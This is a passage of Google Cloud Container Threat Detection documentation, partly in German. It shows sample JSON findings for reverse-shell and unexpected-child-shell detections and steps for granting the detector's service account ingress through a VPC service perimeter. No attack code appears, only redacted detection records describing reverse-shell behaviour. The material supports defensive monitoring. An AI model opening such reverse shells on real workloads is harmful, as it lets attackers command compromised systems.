"KUBERNETES_PORT_443_TCP_PROTO=tcp",
"KUBERNETES_PORT_443_TCP_PORT=443",
"HOME=/root"
],
"Container_Creation_Timestamp": {
"seconds": 1663191345,
"nanos": 0
},
"Pod_Name": "CONTAINER_NAME"
}
}
Reverse Shell
{
"finding": {
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
"parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
"resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
"state": "ACTIVE",
"category": "Reverse Shell",
"sourceProperties": {
"Reverse_Shell_Stdin_Redirection_Src_Ip": "SOURCE_IP_ADDRESS",
"Environment_Variables": ["HOSTNAME\u003dreverse-shell",
"KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT",
"KUBERNETES_PORT_443_TCP_PORT\u003d443", "PYTHONUNBUFFERED\u003d1",
"KUBERNETES_SERVICE_PORT\u003d443",
"KUBERNETES_SERVICE_HOST\u003dIP_ADDRESS",
"PATH\u003d/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/p
ython3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
, "PWD\u003d/home/vmagent/app", "LANG\u003dC.UTF-8", "SHLVL\u003d1",
"HOME\u003d/root", "KUBERNETES_PORT_443_TCP_PROTO\u003dtcp",
"KUBERNETES_SERVICE_PORT_HTTPS\u003d443",
"DEBIAN_FRONTEND\u003dnoninteractive", "PORT\u003d8080",
"KUBERNETES_PORT_443_TCP_ADDR\u003dIP_ADDRESS",
"KUBERNETES_PORT_443_TCP\u003dtcp://IP_ADDRESS:PORT", "_\u003d/bin/echo"],
"Container_Image_Uri": "CONTAINER_IMAGE_URI",
"Process_Binary_Fullpath": "BINARY_PATH",
"Container_Creation_Timestamp": {
"seconds": 1.617989861E9,
"nanos": 0.0
},
"Pod_Name": "POD_NAME",
"Container_Name": "CONTAINER_NAME",
"Process_Arguments": ["BINARY_PATH", "BINARY_NAME"],
"Pid": 15.0,
"Reverse_Shell_Stdin_Redirection_Dst_Port": DESTINATION_PORT,
"Container_Image_Id": "CONTAINER_IMAGE_ID",
"Reverse_Shell_Stdin_Redirection_Dst_Ip": "DESTINATION_IP_ADDRESS",
"Pod_Namespace": "default",
"VM_Instance_Name": "INSTANCE_ID",
"Reverse_Shell_Stdin_Redirection_Src_Port": SOURCE_PORT,
"description": "A process started with stream redirection to a remote
connected socket. With a reverse shell, an attacker can communicate from a
compromised workload to an attacker-controlled machine. The attacker can
then command and control the workload to perform desired actions, for
example as part of a botnet.",
"Parent_Pid": 1.0,
"Process_Creation_Timestamp": {
"seconds": 1.61798989E9,
"nanos": 6.16573691E8
}
},
"securityMarks": {
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
},
"eventTime": "2021-04-09T17:38:10.904Z",
"createTime": "2021-04-09T17:38:15.486Z",
"propertyDataTypes": {
"Container_Image_Id": {
"primitiveDataType": "STRING"
},
"Container_Creation_Timestamp": {
"dataType": "TIMESTAMP",
"structValue": {
"fields": {
"seconds": {
"primitiveDataType": "NUMBER"
},
"nanos": {
"primitiveDataType": "NUMBER"
}
}
}
},
"Pod_Namespace": {
"primitiveDataType": "STRING"
},
"Environment_Variables": {
"listValues": {
"propertyDataTypes": [{
"primitiveDataType": "STRING"
}]
}
},
"Reverse_Shell_Stdin_Redirection_Dst_Ip": {
"primitiveDataType": "STRING"
},
"description": {
"primitiveDataType": "STRING"
},
"Process_Arguments": {
"listValues": {
"propertyDataTypes": [{
"primitiveDataType": "STRING"
}]
}
},
"Pid": {
"primitiveDataType": "NUMBER"
},
"Reverse_Shell_Stdin_Redirection_Src_Ip": {
"primitiveDataType": "STRING"
},
"Container_Image_Uri": {
"primitiveDataType": "STRING"
},
"Reverse_Shell_Stdin_Redirection_Dst_Port": {
"primitiveDataType": "NUMBER"
},
"Pod_Name": {
"primitiveDataType": "STRING"
},
"Process_Creation_Timestamp": {
"dataType": "TIMESTAMP",
"structValue": {
"fields": {
"seconds": {
"primitiveDataType": "NUMBER"
},
"nanos": {
"primitiveDataType": "NUMBER"
}
}
}
},
"Reverse_Shell_Stdin_Redirection_Src_Port": {
"primitiveDataType": "NUMBER"
},
"Parent_Pid": {
"primitiveDataType": "NUMBER"
},
"VM_Instance_Name": {
"primitiveDataType": "STRING"
},
"Container_Name": {
"primitiveDataType": "STRING"
},
"Process_Binary_Fullpath": {
"primitiveDataType": "STRING"
}
},
"severity": "CRITICAL",
"workflowState": "NEW",
"canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
},
"resource": {
"name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
"projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"projectDisplayName": "PROJECT_ID",
"parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"parentDisplayName": "PROJECT_ID",
"type": "google.container.Cluster"
}
}
Unerwartete untergeordnete Shell
{
"finding": {
"access": {},
"canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
"category": "Unexpected Child Shell",
"cloudDlpDataProfile": {},
"cloudDlpInspection": {},
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": "CONTAINER_IMAGE_ID"
}
],
"createTime": "2023-06-29T17:34:13.765Z",
"database": {},
"description": "A process should not normally create child shell processes, spawn a child shell process.",
"eventTime": "2023-06-29T17:34:13.492Z",
"exfiltration": {},
"findingClass": "THREAT",
"findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
"indicator": {},
"kernelRootkit": {},
"kubernetes": {
"pods": [
{
"ns": "default",
"name": "CONTAINER_NAME",
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": CONTAINER_IMAGE_ID"
}
]
}
]
},
"mitreAttack": {
"primaryTactic": "EXECUTION",
"primaryTechniques": [
"COMMAND_AND_SCRIPTING_INTERPRETER"
]
},
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
"parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
"parentDisplayName": "Container Threat Detection",
"processes": [
{
"binary": {
"path": "\"/home/vmagent/app/temp/dash\"",
"size": "31376",
"sha256": "31351885b07570f450f57bd19cf28ff4310b8774a1c2580c3c7c9e7336c8467e",
"hashedSize": "31376",
"partiallyHashed": false
},
"script": {
"size": "0",
"hashedSize": "0",
"partiallyHashed": false
},
"args": [
"\"./temp/dash\""
],
"argumentsTruncated": false,
"envVariables": [
{
"name": "\"HOSTNAME\"",
"val": "\"ktd-test-unexpected-child-shell-3f50de2ab54bac1b\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT\"",
"val": "\"tcp://10.52.113.1:443\""
},
{
"name": "\"PYTHONUNBUFFERED\"",
"val": "\"1\""
},
{
"name": "\"KUBERNETES_SERVICE_PORT\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_SERVICE_HOST\"",
"val": "\"10.52.113.1\""
},
{
"name": "\"PATH\"",
"val": "\"/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
},
{
"name": "\"PWD\"",
"val": "\"/home/vmagent/app\""
},
{
"name": "\"LANG\"",
"val": "\"C.UTF-8\""
},
{
"name": "\"SHLVL\"",
"val": "\"1\""
},
{
"name": "\"HOME\"",
"val": "\"/root\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
"val": "\"tcp\""
},
{
"name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
"val": "\"443\""
},
{
"name": "\"DEBIAN_FRONTEND\"",
"val": "\"noninteractive\""
},
{
"name": "\"PORT\"",
"val": "\"8080\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
"val": "\"10.52.113.1\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP\"",
"val": "\"tcp://10.52.113.1:443\""
},
{
"name": "\"_\"",
"val": "\"./temp/dash\""
}
],
"pid": "15",
"parentPid": "14"
},
{
"binary": {
"path": "\"/home/vmagent/app/temp/httpd\"",
"size": "0",
"hashedSize": "0",
"partiallyHashed": false
},
"script": {
"size": "0",
"hashedSize": "0",
"partiallyHashed": false
},
"args": [
"\"./temp/httpd\""
],
"argumentsTruncated": false,
"pid": "14",
"parentPid": "13"
}
],
"resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"severity": "CRITICAL",
"state": "ACTIVE",
"vulnerability": {}
},
"resource": {
"name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"display_name": "CLUSTER_ID",
"project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"project_display_name": "PROJECT_ID",
"parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"parent_display_name": "PROJECT_ID",
"type": "google.container.Cluster",
"folders": []
},
"sourceProperties": {
"Process_Arguments": [
"./temp/dash"
],
"Pid": 15,
"Process_Creation_Timestamp": {
"seconds": 1688060050,
"nanos": 207040864
},
"Container_Image_Uri": "CONTAINER_IMAGE_URI",
"Process_Binary_Fullpath": "/home/vmagent/app/temp/dash",
"VM_Instance_Name": "INSTANCE_ID",
"Pod_Name": "POD_NAME",
"Pod_Namespace": "default",
"Container_Name": "CONTAINER_NAME",
"Container_Image_Id": "CONTAINER_IMAGE_ID",
"Container_Creation_Timestamp": {
"seconds": 1688060050,
"nanos": 0
},
"Parent_Pid": 14,
"Environment_Variables": [
"HOSTNAME=ktd-test-unexpected-child-shell-3f50de2ab54bac1b",
"KUBERNETES_PORT_443_TCP_PORT=443",
"KUBERNETES_PORT=tcp://10.52.113.1:443",
"PYTHONUNBUFFERED=1",
"KUBERNETES_SERVICE_PORT=443",
"KUBERNETES_SERVICE_HOST=10.52.113.1",
"PATH=/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"PWD=/home/vmagent/app",
"LANG=C.UTF-8",
"SHLVL=1",
"HOME=/root",
"KUBERNETES_PORT_443_TCP_PROTO=tcp",
"KUBERNETES_SERVICE_PORT_HTTPS=443",
"DEBIAN_FRONTEND=noninteractive",
"PORT=8080",
"KUBERNETES_PORT_443_TCP_ADDR=10.52.113.1",
"KUBERNETES_PORT_443_TCP=tcp://10.52.113.1:443",
"_=./temp/dash"
]
}
}
Von einem Dienstperimeter geschützte Projekte scannen
Wenn Sie Security Command Center nach dem 7. Dezember 2023 auf Organisationsebene aktiviert haben und einen Dienstperimeter haben, der den Zugriff auf bestimmte Projekte und Dienste blockiert, müssen Sie dem Dienstkonto für Container Threat Detection eingehenden Zugriff auf diesen Dienstperimeter gewähren. Andernfalls kann Container Threat Detection keine Ergebnisse zu den geschützten Projekten und Diensten liefern.
Bei Aktivierungen auf Organisationsebene ist die Dienstkonto-ID eine E-Mail-Adresse im folgenden Format:
service-org-ORGANIZATION_ID@gcp-sa-ktd-hpsa.iam.gserviceaccount.com
Ersetzen Sie im vorherigen Beispiel ORGANIZATION_ID durch die numerische Kennzeichnung Ihrer Organisation.
Führen Sie die folgenden Schritte aus, um einem Dienstkonto eingehenden Zugriff auf einen Dienstperimeter zu gewähren.
Rufen Sie VPC Service Controls auf.
Wählen Sie in der Symbolleiste Ihre Google Cloud-Organisation aus.
Wählen Sie in der Drop-down-Liste die Zugriffsrichtlinie aus, die den Dienstperimeter enthält, auf den Sie Zugriff gewähren möchten.
Die mit der Zugriffsrichtlinie verknüpften Dienstperimeter werden in der Liste angezeigt.
Klicken Sie auf den Namen des Dienstes.
Klicken Sie auf Perimeter bearbeiten.
Klicken Sie im Navigationsmenü auf Richtlinie für eingehenden Traffic.
Klicken Sie auf Regel hinzufügen.
Konfigurieren Sie die Regel so:
FROM-Attribute des API-Clients
- Wählen Sie für Quelle die Option Alle Quellen aus.
- Wählen Sie unter Identität die Option Ausgewählte Identitäten aus.
- Klicken Sie im Feld Add User/Service Account (Nutzer/Dienstkonto hinzufügen) auf Select (Auswählen).
- Geben Sie die E-Mail-Adresse des Dienstkontos ein. Wenn Sie sowohl Dienstkonten auf Organisationsebene als auch auf Projektebene haben, fügen Sie beide hinzu.
- Klicken Sie auf Speichern.
TO-Attribute von GCP-Diensten/-Ressourcen
-
Wählen Sie für Projekt die Option Alle Projekte aus.
Wählen Sie unter Dienste die Option Alle Dienste oder jeden der folgenden Dienste aus, die für Container Threat Detection erforderlich sind:
- Container Threat Detection API
Wenn ein Dienstperimeter den Zugriff auf einen erforderlichen Dienst einschränkt, kann Container Threat Detection keine Ergebnisse für diesen Dienst liefern.
Klicken Sie im Navigationsmenü auf Speichern.
Weitere Informationen finden Sie unter Richtlinien für eingehenden und ausgehenden Traffic konfigurieren.
Nächste Schritte
Weitere Informationen zur Funktionsweise von Container Threat Detection.
Weitere Informationen zum Untersuchen und Entwickeln von Reaktionsplänen für Bedrohungen.